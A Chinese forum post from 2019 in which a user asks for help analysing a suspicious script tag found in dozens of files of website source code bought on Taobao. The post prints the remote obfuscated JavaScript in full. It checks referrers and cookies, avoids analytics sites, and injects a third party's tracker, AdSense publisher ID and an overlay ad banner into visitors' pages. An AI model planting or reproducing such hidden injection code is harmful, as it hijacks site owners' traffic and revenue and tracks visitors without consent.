本帖最后由 送子神医 于 2019-4-8 15:48 编辑
淘宝买的源码怀疑有马,发现几十个文件都引用了这个JS代码,大佬帮忙分析下这个JS是干吗?
- <sCRiPT src=//DwZ.cN/jscnzz></sCRIpT>
复制代码
通过不断的变换大小写字母,在几十个文件里插入了这段短网址引用的JS代码,
短网址跳转的链接地址是 http://dayeweb.linggao8sj.cn/images/js/jquery.min.js
里面的代码:小白水平,只能看懂一部分
- <!--
- function tmpCK(n,v,s){
- if(v){
- var t1=new Date();t1.setTime(t1.getTime()+(s*1000));
- document.cookie = n+"="+escape(v)+";expires="+t1.toGMTString()+";path=/;";
- }else{
- var a1=document.cookie.split("; ");
- for(var i=0;i<a1.length;i++){var a2=a1[i].split("=");if(a2[0]==n){v=a2[1];}}
- }
- return v;
- }
- function tmpCheckRef(s){
- var a="&pn=0|tongji.baidu.com|umeng.com|chinaz.com|aizhan.com|51.la".split("|");
- for(i=0;i<a.length;i++){
- if(s.indexOf(a[i])!=-1){
- return false;
- }
- }
- return true;
- }
- function tmpPass(s){
- var a="shjfjx.cn|baobaophoto.com".split("|");
- for(i=0;i<a.length;i++){
- if(s.indexOf(a[i])!=-1){
- return false;
- }
- }
- return true;
- }
- function tmpCheckGG(s){
- var a="sdyyyz.net|ychsyxx.com|sqnsbd.cn|fsbhsyxx.com|lgzkck.com|ccinchina.com|cnwhkc.com|yznsbd.com|lzhdcy.com|dongfangrilong.com|janlea.com.cn|hansbd.cn|xinxiancai.com|zgks123.com|gxmsyfx.com|dxd.cn|serverall.com.cn|rcet.cn|m.hqx666.com|jzzxzg.com|jsnsbd.cn|hongyuanjianshe.com|jjghsjy.com|jsnsbd.com|wap.reprc.com|gorsun.com|sewhy.com|xin-lian.cn|xingyuntuofu.com|allcoolmen.com|zrsh100.com|dhbly.com|zzdingsheng.net|0592jhy.com|51zxwd.com|gxgjgf.com|jsjzcks.com|pdsby.com|4g.xadcfk.com|mm.allcoolmen.com|szrcm.com|m.ylhasd.com|bankxc.cn|henanart.com|obolee.com.cn|remotcon.net|shenerkj.cn|xadcfk.com|jxlakeside.com|pc.cqddgc.cn|hebeipet.com|hnfejx.com|hngd99.com|jiaransheng.com|asia.eeeex.com|m.idianzheng.com|bio-redwood.com|byguan.com|ccsytz.com|gsym.com|m88888888.com|zhuxuecai.com|haoyijia88.com|hushi.zgks123.com|sn.dxd.cn|chinaquannao.com|dyssw.com|nyxgl.com|szlove.com|feidongman.com|diqiushijie.com|caibocn.com|qdhswj.com|saglee.com.cn|wysxbqx.com|.edu.cn|.gov.cn|bjfynjk.com|fanyiyuanlin.com|fanyi-design.net|cqqlxh.com|cscec2bzcb.com.cn|msheying.com|shadou.net|znzkck.com|caea.org.cn|210.35.32.5|561365.com|61.150.112.62|aoyou扶墙165.com|aoyou扶墙173.com|bssgnu.cn|cfpawd.cn|cjwvkk.cn|ckdszq.cn|goodnic.net|gxszk.net|hoypyr.cn|jdbot.net|juyantang.cn|luoyangnanke.com|m.daxuehua.com|meinvxiezhen.eeeex.com|mmsbvq.cn|mqvchw.cn|mxoueg.cn|obeacz.cn|oshoxw.cn|49host.com|wlwlbo.cn|wwohan.cn|750v.com|915fu.com|anzhuo.me|bailubf.com|bzt.cn.com|cqzs100.com|daxuehua.com|dgtvad.com|diannaowang.net|fxisjl.cn|gdrelx.com|gzdic.cn|hxffbw.com|jianjian.org|jvhao.com|jzsports.cn|leimost.com|lelers.com|mitalit.com|mxgzt.com|nuoruima.com|scyakeli.com|sh-yaoxing.com|shenbar.com|shxdre.com|ustb-mba.com|whcfht.com|xjj01.com|ylhasd.com|youyuzheng120.com|zhainancili.net|zhihgk.com|zlfour.cn|zwecun.cn|zzwk.cn|yuemei120.com|zqfsyl.cn|zrhagw.cn|zrqfdn.cn|001gm.net|kuadmin.cn|haiqiaoshiji.com|nsbdjssy.com|kafuter.cn|rmzt.com|ttzqnews.com|fangshifu.com|janlea.com|qxgs.cn|worldkids.com.cn".split("|");
- for(i=0;i<a.length;i++){
- if(s.indexOf(a[i])!=-1){
- return false;
- }
- }
- return true;
- }
- if(typeof(tmpRef)=="undefined"){
- var tmpBody=document.body;
- var tmpHost=window.location.host.replace("www.","");
- var tmpRef=tmpCK('re'+'f')?tmpCK('re'+'f'):tmpCK('re'+'f',document.referrer,9999);
- if(tmpRef&&tmpPass(tmpHost)){
- var tmpHead=document.getElementsByTagName("head")[0];
- var tmpWX='y'+'x7'+'1y'+'x';var tmpText=unescape("%u60A8%u53EF%u4EE5%u6DFB%u52A0%u201C%23wx%23%u201D%u5FAE%u4FE1%u53F7%uFF0C%u54A8%u8BE2%u201C%23tt%23%u201D...").replace("#wx#",tmpWX).replace("#tt#","\u7535\u5f71\u002f\u8fde\u7eed\u5267\u002f\u97f3\u4e50\u002f\u6587\u6863\u002f\u4f18\u60e0\u5377");
- if(tmpRef.indexOf(tmpHost)==-1&&tmpCheckRef(tmpRef)){
- var tmpMeta = document.createElement('me'+'ta');
- tmpMeta.name = 'vi'+'ewpo'+'rt';
- tmpMeta.content = 'wid'+'th=de'+'vice-wid'+'th,init'+'ial-sca'+'le=1'+'.0,ma'+'xim'+'um-sc'+'ale=1'+'.0,us'+'er-sc'+'alab'+'le=n'+'o';
- tmpHead.appendChild(tmpMeta);
- var tmpJs = document.createElement('scr'+'ipt');
- tmpJs.src = 'htt'+'ps:/'+'/v'+'1.cn'+'zz.co'+'m/z_st'+'at.ph'+'p?i'+'d=590'+'4975&web_i'+'d=590'+'4975';
- tmpHead.appendChild(tmpJs);
- var tmpAd = document.createElement('scr'+'ipt');
- tmpAd.src = '//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js';
- tmpHead.appendChild(tmpAd);
- tmpAd.onload=tmpAd.onreadystatechange=function(){(adsbygoogle = window.adsbygoogle || []).push({google_ad_client:"pub-1732909096494993",enable_page_level_ads: true});}
- if(tmpCheckGG(tmpHost)){
- var ggDiv=document.createElement('di'+'v');
- ggDiv.innerHTML='<d'+'iv st'+'yle="posi'+'tion:fi'+'xed;t'+'op:0;le'+'ft:0;z-ind'+'ex:21474'+'83648;_posi'+'tion:abso'+'lute;wid'+'th:10'+'0%;te'+'xt-al'+'ign:cen'+'ter;"><'+'a hr'+'ef="ja'+'vascr'+'ipt:'+';" tit'+'le="clo'+'se" oncl'+'ick="th'+'is.parentNo'+'de.parentNo'+'de.parentNo'+'de.removeCh'+'ild(th'+'is.parentNo'+'de.parentNo'+'de)" st'+'yle="posi'+'tion:abso'+'lute;to'+'p:0;ri'+'ght:0;z-ind'+'ex:21474'+'83649;disp'+'lay:blo'+'ck;wid'+'th:5'+'0px;hei'+'ght:2'+'0px;co'+'lor:#f6'+'6;ba'+'ckgro'+'und:#f'+'ff;">\u5173\u95ed</'+'a><i'+'ns cl'+'ass="a'+'dsbygo'+'ogle" st'+'yle="di'+'spl'+'ay:blo'+'ck;te'+'xt-al'+'ign:ri'+'ght;" da'+'ta-a'+'d-clie'+'nt="c'+'a-p'+'ub-17'+'3290'+'9096'+'4949'+'93" da'+'ta-a'+'d-sl'+'ot="272'+'8648'+'043" da'+'ta-a'+'d-fo'+'rmat="au'+'to"></i'+'ns></d'+'iv>';
- tmpBody.insertBefore(ggDiv,tmpBody.firstChild);
- var ggJs = document.createElement('scr'+'ipt');
- ggJs.type = 'text/javascript';
- ggJs.async = true;
- ggJs.src = '//pag'+'ea'+'d2.go'+'ogles'+'yndicati'+'on.c'+'om/pa'+'gea'+'d/j'+'s/a'+'dsbygo'+'ogle.j'+'s';
- tmpHead.appendChild(ggJs);
- ggJs.onload=ggJs.onreadystatechange=function(){
- if(!this.readyState||this.readyState=='loaded'||this.readyState=='complete'){
- ggDiv.style.height="9"+"0p"+"x";
- (adsbygoogle = window.adsbygoogle || []).push({});
- }
- ggJs.onload=ggJs.onreadystatechange=null;
- }
- }
- }
- }
- }
- -->
复制代码
|